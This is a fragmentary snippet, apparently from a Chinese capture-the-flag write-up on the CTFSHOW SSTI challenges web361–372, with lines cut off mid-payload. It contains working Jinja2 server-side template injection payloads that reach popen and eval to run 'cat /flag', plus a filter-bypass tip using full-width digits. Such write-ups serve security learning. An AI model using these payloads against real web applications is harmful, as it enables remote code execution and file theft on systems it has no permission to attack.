web362 web363 web364 web365 web366、367 web368 web369 web370 web371 web372 跟大佬交换了思路学到了可以用全角数字代替正常数字,大家可以自行探索了。。。 建议大家先看下笔者之前写的 模板注入的文章 web361 payload name={ {().__class__.__mro__[-1].__subclasses__()[132].__init__.__g...
CTFSHOW-SSTIweb361?name={{().__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}} web362?name={{x.__init__.__globals__['__builtins__'].eval('__import__("os").popen("cat /flag").read()')}} ...